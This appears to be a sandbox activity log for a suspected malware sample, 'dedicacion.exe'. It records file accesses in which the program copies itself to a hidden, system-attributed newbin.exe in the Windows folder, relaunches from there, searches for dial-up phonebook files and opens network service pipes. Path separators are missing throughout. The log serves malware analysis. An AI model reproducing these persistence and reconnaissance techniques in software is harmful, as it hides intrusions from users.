Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: C:WINDOWSsystem32mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: c:dedicacion.exe.config (OPEN_EXISTING)
Open File: c:dedicacion.exe (OPEN_EXISTING)
Get File Attributes: C:WINDOWSMicrosoft.NETFrameworkv2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:WINDOWSMicrosoft.NETFrameworkv2.0.50727mscorwks.dll
Create/Open File: DeviceGpc (OPEN_ALWAYS)
Create/Open File: DeviceTcp6 (OPEN_ALWAYS)
Open File: .PIPEEVENTLOG (OPEN_EXISTING)
Open File: .PIPEROUTER (OPEN_EXISTING)
Get File Attributes: C:WINDOWSnewbin.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:dedicacion.exe to C:WINDOWSnewbin.exe
Set File Attributes: C:WINDOWSnewbin.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:WINDOWSsystem32 ()
Find File: C:WINDOWSsystem32netsh.exe
Open File: C:WINDOWS ()
Find File: C:WINDOWSnewbin.exe
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:WINDOWSsystem32WBEMLogs Flags: (SECURITY_ANONYMOUS)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: newbin.exe (OPEN_EXISTING)
Create/Open File: C:WINDOWSnewbin.exe (OPEN_ALWAYS)
Get File Attributes: C:WINDOWSsystem32.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSHelp.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: C:WINDOWSsystem32mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSnewbin.exe.config (OPEN_EXISTING)
Open File: C:WINDOWSnewbin.exe (OPEN_EXISTING)
Get File Attributes: C:WINDOWSMicrosoft.NETFrameworkv2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:WINDOWSMicrosoft.NETFrameworkv2.0.50727mscorwks.dll
Create/Open File: DeviceGpc (OPEN_ALWAYS)
Create/Open File: DeviceTcp6 (OPEN_ALWAYS)
Open File: .PIPEEVENTLOG (OPEN_EXISTING)
Open File: .PIPEROUTER (OPEN_EXISTING)
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
Open File: .PIPElsarpc (OPEN_EXISTING)
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .pipePIPE_EVENTROOT/CIMV2PROVIDERSUBSYSTEM (OPEN_EXISTING)
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:WINDOWSsystem32WBEMLogs Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWS Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSREPAIRSETUP.LOG ()
Open File: .PIPEwkssvc (OPEN_EXISTING)
Open File: .PIPEsrvsvc (OPEN_EXISTING)

Categories: Uncategorized